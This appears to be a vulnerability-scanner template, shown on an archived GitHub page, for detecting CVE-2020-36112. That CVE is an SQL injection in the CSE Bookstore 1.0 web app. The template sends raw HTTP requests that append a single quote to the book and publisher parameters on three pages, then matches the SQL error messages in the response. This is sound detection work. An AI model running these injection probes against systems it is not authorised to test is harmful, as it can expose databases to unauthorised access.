This repository has been archived by the owner on Jun 5, 2022. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 64
/
Copy pathCVE-2020-36112.yaml
59 lines (53 loc) · 2.31 KB
/
CVE-2020-36112.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: https://www.exploit-db.com/exploits/49314
severity: high
tags: cve,cve2020,sqli,cse
requests:
- raw:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
- |
POST /ebook/cart.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
- |
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://{{Hostname}}/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
matchers:
- type: word
part: body
words:
- "get book price failed! You have an error in your SQL syntax"
- "Can't retrieve data You have an error in your SQL syntax"
condition: or